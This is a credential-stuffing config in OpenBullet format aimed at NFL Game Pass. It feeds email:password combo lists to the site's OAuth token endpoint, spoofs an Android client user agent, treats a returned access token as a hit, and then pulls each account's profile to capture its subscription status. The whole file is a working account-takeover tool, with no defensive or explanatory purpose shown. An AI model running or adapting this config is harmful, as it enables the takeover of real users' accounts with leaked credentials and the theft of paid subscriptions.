[SETTINGS]
{
  "Name": "NFL GAMEPASS",
  "SuggestedBots": 50,
  "LastModified": "2018-07-25T20:50:02.5965358+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://www.nflgamepass.com/api/user/oauth/token" AutoRedirect=FALSE 
  CONTENT "username=<USER>&password=<PASS>&grant_type=password&client_id=42cc360e-6fbb-4472-9437-2f088b8730de&device_id=&device_type=Android&device_description=SM-G955N" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: okhttp/3.9.0" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "access_token" 
  KEYCHAIN Failure OR 
    KEY "error_unauthorised" 
PARSE "<SOURCE>" JSON "access_token" Recursive=FALSE -> VAR "TOKEN" "" "" 
REQUEST GET "https://www.nflgamepass.com/api/user/api/users/v1/profile/me" AutoRedirect=FALSE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: okhttp/3.9.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Authorization: Bearer <TOKEN>" 
PARSE "<SOURCE>" JSON "currentSubscription" Recursive=FALSE -> CAP "SUBSCRIPTION" "" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "currentSubscription\":null" 
